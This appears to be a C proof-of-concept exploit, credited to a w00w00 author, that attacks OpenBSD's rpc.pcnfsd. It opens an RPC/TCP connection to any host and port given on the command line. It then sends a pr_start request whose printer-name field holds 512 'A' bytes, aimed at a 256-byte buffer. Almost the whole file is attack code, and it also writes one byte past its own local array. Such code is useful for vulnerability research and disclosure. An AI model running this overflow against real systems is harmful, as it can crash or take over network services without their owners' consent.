/* w00w00! */
/* This is to test a vulnerability in OpenBSD's rpc.pcnfsd. */
/* This might include NetBSD or other BSD implementations.  */
/*                                                          */
/* Shok (Matt Conover), shok@dataforce.net                  */

#include <rpc/rpc.h>
#include <stdio.h>
#include <memory.h> /* for memset */
#include "pcnfsd.h"
#include <netdb.h>

#if RPC_SVC
 static void _msgout();
 void msg_out(msg) char *msg; {_msgout(msg);}
#endif
#if RPC_HDR
 extern void msg_out();
#endif

/* Default timeout can be changed using clnt_control() */
static struct timeval TIMEOUT = { 60, 0 };

pr_start_results *pcnfsd_pr_start_1(pr_start_args *argp, CLIENT *clnt);

void main(int argc, char **argv)
{
  CLIENT *cl;

  pr_start_args stra;

  struct hostent *he;
  struct sockaddr_in saddr;
  
  char buf[512]; /* buffer to overflow is 256. */

  register int i;
  int sock = RPC_ANYSOCK;



  if (argc < 3) {
     printf("Usage: %s <host> <port>\n", argv[0]);
     exit(1);
  }

  if ((he = gethostbyname(argv[1])) == NULL) {
     herror("gethostbyname");
     exit(1);
  }

  bcopy(he->h_addr, (caddr_t)&saddr.sin_addr, he->h_length);
  saddr.sin_family = AF_INET;
  saddr.sin_port   = htons(atoi(argv[2]));

  if ((cl = clnttcp_create(&saddr, PCNFSDPROG, PCNFSDVERS, &sock, 0, 0))
	== NULL) {
     clnt_pcreateerror("clnttcp_create");
     exit(1);
  }

  for (i = 0; i < sizeof(buf); i++) buf[i] = 'A';
  buf[512] = '\0';

  bzero(&stra, sizeof(stra));
  stra.system = "localhost"; /* /var/spool/righthere */
  stra.pn     = buf;
  stra.user   = "root";
  stra.file  = "realfilename"; /* /var/spool/stra.system/right here */
  stra.opts   = "\0";
  /* final file (must exist) is /var/spool/system/file.spl */

  pcnfsd_pr_start_1(&stra, cl);
}

pr_start_results *
pcnfsd_pr_start_1(pr_start_args *argp, CLIENT *clnt)
{
	static pr_start_results clnt_res;

	memset((char *)&clnt_res, 0, sizeof(clnt_res));
	if (clnt_call(clnt, PCNFSD_PR_START, (xdrproc_t) xdr_pr_start_args, argp, (xdrproc_t) xdr_pr_start_results, &clnt_res, TIMEOUT) != RPC_SUCCESS) {
		return (NULL);
	}
	return (&clnt_res);
}
